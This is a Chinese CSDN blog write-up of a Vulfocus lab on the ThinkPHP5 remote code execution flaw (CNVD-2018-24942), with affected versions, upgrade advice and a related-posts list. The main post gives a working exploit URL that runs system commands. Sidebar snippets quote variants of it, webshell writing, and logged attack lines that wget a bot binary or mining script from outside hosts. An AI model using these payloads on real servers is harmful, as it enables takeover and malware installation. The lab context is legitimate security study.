[Vulfocus解题系列]ThinkPHP5 远程代码执行漏洞(CNVD-2018-24942)

最新推荐文章于 2024-04-03 00:34:01 发布
最新推荐文章于 2024-04-03 00:34:01 发布
阅读量1k 收藏 3
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118463552
版权

漏洞介绍

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。

影响版本

ThinkPHP 5.*,<5.1.31
ThinkPHP <=5.0.23

解题过程

1.开启靶场环境
在这里插入图片描述
2.在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp

4.成功得到flag
在这里插入图片描述

结论

此漏洞是因为框架对传入的路由参数过滤不严格,导致攻击者可以操作非预期的控制器类来远程执行代码。进一步分析发现,某些ThinkPHP版本不受已公开的POC的影响,这是由于该POC缺乏完备性考虑。因此,强烈建议用户及时将5.0.x版本升级到5.0.23,将5.1.x版本升级到5.1.31,以免遭受攻击。

漏洞修复

官方修复方案如下:官方修复方案

00勇士王子
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP5远程代码执行CNVD-2018-24942
最新发布
ANOrange的博客
04-03 379
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。本文包含POC和ThinkPHP漏洞利用工具
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
java恶意代码检测源码-imgApi:超简图床/微博图床
06-05
java恶意代码检测源码 超简Api图床 —— 专为Api而生 超简Api图床 是基于ThinkPHP 5.1实现的一套Api图床程序,主要包含以下特色: 无数据库模式,简单配置,一键搭建 第三方接口接入,不占用服务器空间 【已经失效】接入搜狗Api平台,无需配置,全球CDN加速,永久不限量图片存储 接入新浪Api平台,无需配置,全球CDN加速,永久不限量图片存储 支持服务器存储模式,代替普通图床 超简单Api使用,提供统一Api实现图片上传 通讯密钥过滤恶意上传 支持跨域提交访问 免费、开源 支持简单返回,直接返回图片网址 超简Api图床的运行环境要求PHP5.6以上。 超简图床Java版本已经发布,欢迎使用【 】 安装 下载本套系统源码,解压至网站根目录 访问 进入主页 点击系统设置,进入设置页面,进行系统的首次配置,并修改管理员密码和通讯密钥 默认管理密码为:123456 默认通讯密钥为:123456 保存配置后,即可开始使用 如果登陆提示成功后还是一直弹出登陆,请修改php.ini 里面的 always_populate_raw_post_data = -1 (去掉前面的;)
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
vulfocus——thinkphp代码执行(CNVD-2018-24942)
m0_62063669的博客
09-07 604
ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。4.访问一下http://ip/shell.php,然后用蚁剑连接,在/tmp下找到flag。2.构造payload远程代码执行,在/tmp下获得flag。3.我们还可以通过写入一句话木马的方式获得flag。
php序列化漏洞扫描,php 漏洞扫描
weixin_34410564的博客
03-09 782
"GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://love.thotiana.live/bins/x86.bot;cat%20x86.bot%20...
Thinkphp 5-rce 漏洞复现(vulhub)
MDSEC的博客
08-21 177
ThinkPHP其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。1.在虚拟机中拉去thinkphp 5-rce镜像。输出关于php的配置信息。执行命令 whoami。连接成功,说明存在漏洞。写入webshell。
攻防世界web---php_rce
gongjingege的博客
07-09 475
php_rce 没有题目描述,直接打开链接 看到这一脸懵,试了几种常用的方法,什么也没发现,于是从内容入手,百度一下thinkphp 5.0版本,发现这个版本存在远程执行命令的漏洞,对漏洞这方面不了解,网上查找一下这个版本的漏洞 漏洞链接 找到了payload /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 没有发现flag,于是
thinkphp5远程代码执行漏洞分析(一)
weixin_30482383的博客
08-28 601
payload 测试版本thinkphp5.1beta url =>http://127.0.0.1/thinkphp5.1beta/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 漏洞...
ThinkPHP V5(漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3464
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
vulhub-thinkphp漏洞复现
qq_51922767的博客
09-14 2368
vulhub-thinkphp漏洞复现
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 607
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现
yzl_007的博客
08-04 984
ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现 影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞漏洞复现 远程代码执行 直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw
XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞
Onlyone_1314的博客
09-03 987
先访问题目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
ThinkPHP5 5.0.23远程代码执行漏洞复现
weixin_52347768的博客
03-28 6621
漏洞介绍: ThinkPHP5.0.23版本的漏洞:获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞漏洞复现+挂马: 使用御剑对网址进行扫描,进入到主页面 判断是否存在漏洞,访问/index.php?s=captcha页面,会出现报错 使用hackbar插件发送post请求:执行whoami命令 _method=__construct&filter[]=system&method=ge.
挖矿程序 入侵php,利用ThinkPHP漏洞下载并执行挖矿脚本
weixin_33173126的博客
03-17 1239
利用url如下:/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;curl%20http://205.185.113.123...
thinkphp 远程代码执行原理
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值